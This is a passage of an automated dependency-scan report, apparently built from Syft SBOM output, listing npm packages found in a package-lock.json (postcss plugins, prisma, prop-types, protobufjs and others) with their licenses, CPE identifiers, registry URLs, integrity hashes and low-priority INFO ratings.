evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:postcss-js:postcss-js:4.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:postcss-js:postcss_js:4.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:postcss_js:postcss-js:4.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:postcss_js:postcss_js:4.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:postcss:postcss-js:4.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:postcss:postcss_js:4.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/postcss-js@4.1.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/postcss-js/-/postcss-js-4.1.0.tgz
|
|
integrity: sha512-oIAOTqgIo7q2EOwbhb8UalYePMvYoIeRY2YKntdpFQXNosSu3vLrniGgmH9OKs/qAkfoj5oB3le/7mINW1LCfw==
|
|
dependencies:
|
|
camelcase-css: ^2.0.1
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 92ac10dec31ee632
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: postcss-load-config 6.0.1'
|
|
title: postcss-load-config 6.0.1
|
|
description: 'Package discovered: postcss-load-config 6.0.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 07fb83a013bf4ef4
|
|
name: postcss-load-config
|
|
version: 6.0.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:postcss-load-config:postcss-load-config:6.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:postcss-load-config:postcss_load_config:6.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:postcss_load_config:postcss-load-config:6.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:postcss_load_config:postcss_load_config:6.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:postcss-load:postcss-load-config:6.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:postcss-load:postcss_load_config:6.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:postcss_load:postcss-load-config:6.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:postcss_load:postcss_load_config:6.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:postcss:postcss-load-config:6.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:postcss:postcss_load_config:6.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/postcss-load-config@6.0.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/postcss-load-config/-/postcss-load-config-6.0.1.tgz
|
|
integrity: sha512-oPtTM4oerL+UXmx+93ytZVN82RrlY/wPUV8IeDxFrzIjXOLF1pN+EmKPLbubvKHT2HC20xXsCAH2Z+CKV6Oz/g==
|
|
dependencies:
|
|
lilconfig: ^3.1.1
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: a302d705f049e265
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: postcss-nested 6.2.0'
|
|
title: postcss-nested 6.2.0
|
|
description: 'Package discovered: postcss-nested 6.2.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 16f11e75cb882477
|
|
name: postcss-nested
|
|
version: 6.2.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:postcss-nested:postcss-nested:6.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:postcss-nested:postcss_nested:6.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:postcss_nested:postcss-nested:6.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:postcss_nested:postcss_nested:6.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:postcss:postcss-nested:6.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:postcss:postcss_nested:6.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/postcss-nested@6.2.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/postcss-nested/-/postcss-nested-6.2.0.tgz
|
|
integrity: sha512-HQbt28KulC5AJzG+cZtj9kvKB93CFCdLvog1WFLf1D+xmMvPGlBstkpTEZfK5+AN9hfJocyBFCNiqyS48bpgzQ==
|
|
dependencies:
|
|
postcss-selector-parser: ^6.1.1
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 002cf57b0b0dcab6
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: postcss-selector-parser 6.1.2'
|
|
title: postcss-selector-parser 6.1.2
|
|
description: 'Package discovered: postcss-selector-parser 6.1.2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: f7f4c134629f3b3a
|
|
name: postcss-selector-parser
|
|
version: 6.1.2
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:postcss-selector-parser:postcss-selector-parser:6.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:postcss-selector-parser:postcss_selector_parser:6.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:postcss_selector_parser:postcss-selector-parser:6.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:postcss_selector_parser:postcss_selector_parser:6.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:postcss-selector:postcss-selector-parser:6.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:postcss-selector:postcss_selector_parser:6.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:postcss_selector:postcss-selector-parser:6.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:postcss_selector:postcss_selector_parser:6.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:postcss:postcss-selector-parser:6.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:postcss:postcss_selector_parser:6.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/postcss-selector-parser@6.1.2
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/postcss-selector-parser/-/postcss-selector-parser-6.1.2.tgz
|
|
integrity: sha512-Q8qQfPiZ+THO/3ZrOrO0cJJKfpYCagtMUkXbnEfmgUjwXg6z/WBeOyS9APBBPCTSiDV+s4SwQGu8yFsiMRIudg==
|
|
dependencies:
|
|
cssesc: ^3.0.0
|
|
util-deprecate: ^1.0.2
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 738a4e319226bde2
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: postcss-value-parser 4.2.0'
|
|
title: postcss-value-parser 4.2.0
|
|
description: 'Package discovered: postcss-value-parser 4.2.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: d70570520f43a33c
|
|
name: postcss-value-parser
|
|
version: 4.2.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:postcss-value-parser:postcss-value-parser:4.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:postcss-value-parser:postcss_value_parser:4.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:postcss_value_parser:postcss-value-parser:4.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:postcss_value_parser:postcss_value_parser:4.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:postcss-value:postcss-value-parser:4.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:postcss-value:postcss_value_parser:4.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:postcss_value:postcss-value-parser:4.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:postcss_value:postcss_value_parser:4.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:postcss:postcss-value-parser:4.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:postcss:postcss_value_parser:4.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/postcss-value-parser@4.2.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/postcss-value-parser/-/postcss-value-parser-4.2.0.tgz
|
|
integrity: sha512-1NNCs6uurfkVbeXG4S8JFT9t19m45ICnif8zWLd5oPSZ50QnwMfK+H3jv408d4jw/7Bttv5axS5IiHoLaVNHeQ==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: f330341278522955
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: prisma 5.22.0'
|
|
title: prisma 5.22.0
|
|
description: 'Package discovered: prisma 5.22.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: f76e4353403c9c3d
|
|
name: prisma
|
|
version: 5.22.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: Apache-2.0
|
|
spdxExpression: Apache-2.0
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:prisma:prisma:5.22.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/prisma@5.22.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/prisma/-/prisma-5.22.0.tgz
|
|
integrity: sha512-vtpjW3XuYCSnMsNVBjLMNkTj6OZbudcPPTPYHqX0CJfpcdWciI1dM8uHETwmDxxiqEwCIE6WvXucWUetJgfu/A==
|
|
dependencies:
|
|
'@prisma/engines': 5.22.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 9fc67df1307075e9
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: process-nextick-args 2.0.1'
|
|
title: process-nextick-args 2.0.1
|
|
description: 'Package discovered: process-nextick-args 2.0.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: da765da41b164754
|
|
name: process-nextick-args
|
|
version: 2.0.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:process-nextick-args:process-nextick-args:2.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:process-nextick-args:process_nextick_args:2.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:process_nextick_args:process-nextick-args:2.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:process_nextick_args:process_nextick_args:2.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:process-nextick:process-nextick-args:2.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:process-nextick:process_nextick_args:2.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:process_nextick:process-nextick-args:2.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:process_nextick:process_nextick_args:2.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:process:process-nextick-args:2.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:process:process_nextick_args:2.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/process-nextick-args@2.0.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/process-nextick-args/-/process-nextick-args-2.0.1.tgz
|
|
integrity: sha512-3ouUOpQhtgrbOa17J7+uxOTpITYWaGP7/AhoR3+A+/1e9skrzelGi/dXzEYyvbxubEF6Wn2ypscTKiKJFFn1ag==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: b351d49072943449
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: prop-types 15.8.1'
|
|
title: prop-types 15.8.1
|
|
description: 'Package discovered: prop-types 15.8.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 2485766b0114da33
|
|
name: prop-types
|
|
version: 15.8.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:prop-types:prop-types:15.8.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:prop-types:prop_types:15.8.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:prop_types:prop-types:15.8.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:prop_types:prop_types:15.8.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:prop:prop-types:15.8.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:prop:prop_types:15.8.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/prop-types@15.8.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/prop-types/-/prop-types-15.8.1.tgz
|
|
integrity: sha512-oj87CgZICdulUohogVAR7AjlC0327U4el4L6eAvOqCeudMDVU0NThNaV+b9Df4dXgSP1gXMTnPdhfe/2qDH5cg==
|
|
dependencies:
|
|
loose-envify: ^1.4.0
|
|
object-assign: ^4.1.1
|
|
react-is: ^16.13.1
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: acadb8b8517c78d3
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: proto-list 1.2.4'
|
|
title: proto-list 1.2.4
|
|
description: 'Package discovered: proto-list 1.2.4'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 685c0e3e50c6553a
|
|
name: proto-list
|
|
version: 1.2.4
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: ISC
|
|
spdxExpression: ISC
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:proto-list:proto-list:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:proto-list:proto_list:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:proto_list:proto-list:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:proto_list:proto_list:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:proto:proto-list:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:proto:proto_list:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/proto-list@1.2.4
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/proto-list/-/proto-list-1.2.4.tgz
|
|
integrity: sha512-vtK/94akxsTMhe0/cbfpR+syPuszcuwhqVjJq26CuNDgFGj682oRBXOP5MJpv2r7JtE8MsiepGIqvvOTBwn2vA==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 44c7a82b0c4aafcf
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: proto3-json-serializer 2.0.2'
|
|
title: proto3-json-serializer 2.0.2
|
|
description: 'Package discovered: proto3-json-serializer 2.0.2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 5add12638aea166c
|
|
name: proto3-json-serializer
|
|
version: 2.0.2
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: Apache-2.0
|
|
spdxExpression: Apache-2.0
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:proto3-json-serializer:proto3-json-serializer:2.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:proto3-json-serializer:proto3_json_serializer:2.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:proto3_json_serializer:proto3-json-serializer:2.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:proto3_json_serializer:proto3_json_serializer:2.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:proto3-json:proto3-json-serializer:2.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:proto3-json:proto3_json_serializer:2.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:proto3_json:proto3-json-serializer:2.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:proto3_json:proto3_json_serializer:2.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:proto3:proto3-json-serializer:2.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:proto3:proto3_json_serializer:2.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/proto3-json-serializer@2.0.2
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/proto3-json-serializer/-/proto3-json-serializer-2.0.2.tgz
|
|
integrity: sha512-SAzp/O4Yh02jGdRc+uIrGoe87dkN/XtwxfZ4ZyafJHymd79ozp5VG5nyZ7ygqPM5+cpLDjjGnYFUkngonyDPOQ==
|
|
dependencies:
|
|
protobufjs: ^7.2.5
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: f337eadf0901e415
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: protobufjs 7.5.6'
|
|
title: protobufjs 7.5.6
|
|
description: 'Package discovered: protobufjs 7.5.6'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: a5b5323abf9aae9f
|
|
name: protobufjs
|
|
version: 7.5.6
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
